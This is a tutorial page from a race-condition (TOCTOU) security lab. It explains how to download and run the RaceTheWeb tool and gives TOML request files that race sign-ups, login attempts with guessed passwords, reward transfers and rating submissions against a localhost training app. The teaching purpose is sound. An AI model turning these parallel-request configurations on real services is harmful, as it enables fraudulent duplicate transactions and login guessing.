More Tools
Start with whatever tools you may have.Better tools will be found as you go.

Using a tool can help you find and exploit TOCTOU issues. There are a couple of such tools available in the open-source world:
Name | Notes |
Browser Dev Tools |
|
cURL |
|
We will solve the last challenge using RaceTheWeb. The executable files for RaceTheWeb can be obtained from https://github.com/aaronhnatiw/race-the-web/releases
Which version to download? It depends on the operating-system you are running
Operating System | FIle to be downloaded |
Linux 32-bit | race-the-web_2.0.1_lin32.bin |
Linux 64-bit | race-the-web_2.0.1_lin64.bin |
macOS 32-bit | race-the-web_2.0.1_osx32.app.zip |
macOS 64-bit | race-the-web_2.0.1_osx64.app.zip |
Windows 32-bit | race-the-web_2.0.1_win32.exe |
Windows 64-bit | race-the-web_2.0.1_win64.exe |
On Linux and macOS machines, you need to make the file executable.
Operating System | Command to run on Terminal |
race-the-web_2.0.1_lin32.bin | chmod +x race-the-web_2.0.1_lin32.bin |
race-the-web_2.0.1_lin64.bin | chmod +x race-the-web_2.0.1_lin64.bin |
race-the-web_2.0.1_osx32.app.zip | Extract the zip file chmod +x race-the-web_2.0.1_osx32.app |
race-the-web_2.0.1_osx64.app.zip | Extract the zip file chmod +x race-the-web_2.0.1_osx64.app |
Running RacetheWeb is easy:
- 1.Open command prompt/Terminal
- 2.Navigate to the directory where you have extracted/downloaded the executable binary file
- 3.Run the following command:

A screenshot of a social media post
Description automatically generated
race-the-web portion:
Depending on the operating-system you are using, the race-the-web portion needs to be changed.
Operating System | race-the-web portion |
Linux 32-bit | ./race-the-web_2.0.1_lin32.bin |
Linux 64-bit | ./race-the-web_2.0.1_lin64.bin |
macOS 32-bit | ./race-the-web_2.0.1_osx32.app |
macOS 64-bit | ./race-the-web_2.0.1_osx64.app |
Windows 32-bit | race-the-web_2.0.1_win32.exe |
Windows 64-bit | race-the-web_2.0.1_win64.exe |
<toml-file> portion:
TOML stands for Tom’s Obvious Minimal Language. The TOML file supplied should be having the request details so that race-the-web can run them.
Find TOML file for some of the TimeGap Theory challenges below:
# Sign Up
count = 10
verbose = false
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/sign-up.php"
body = "firstname=tom&password=tom&email=tom%40example.com&rewards=100"
In the above TOML file:
- Count defines how many requests RaceTheWeb tools would be sending in parallel
- Verbose defines the verbosity level of output that is displayed on the screen. The value of this can either be true or false
- Method defines the type of the request. This can be GET, POST, PUT, DELETE etc.
- URL is, well, the url at which request needs to be sent
- Body of the request. You can skip this part if there is no body that needs to be submitted
# Sign In Page
count = 1
verbose = true
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/login.php"
body = "email=tom%40sechow.com&password=1234&submit=Submit"
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/login.php"
body = "email=tom%40sechow.com&password=password&submit=Submit"
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/login.php"
body = "email=tom%40sechow.com&password=tom&submit=Submit"
In the above TOML file:
- Count is 1. However, there are three requests in the file. As such, RaceTheWeb tool will send three parallel requests
- First two requests have wrong password in the request body
# Transfer Rewards
count = 10
verbose = false
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/user/transfer-rewards.php"
body = "from=tom%40sechow.com&to=jerry%40sechow.com&amount=100&submit=Submit"
# Ratings page
count = 1
verbose = false
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/user/rate-the-program.php"
body = "token=ae13e0f1df6412dc4b9e2a9a3354320b6c1f3a65160bcffb552495759870afa3"
cookies = ["PHPSESSID=80c3ffddbfe4771dd408b3c53d4a7a44"]
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/user/rate-the-program.php"
body = "token=bc5091b2f60da51d203a58b2af1c8bd99a443751adb206814d22df79e335a3e5"
cookies = ["PHPSESSID=fab00a2f7f46e33bb57deb4e08153e52"]
In the above TOML file, we are sending a cookie as well.
Now you know:
- 1.Various open-source tools and techniques for finding and exploiting TOCTOU security issues
- 2.How to use RaceTheWeb tool for exploiting TOCTOU security issues
- 3.Writing TOML files for RaceTheWeb tool
Last modified 2yr ago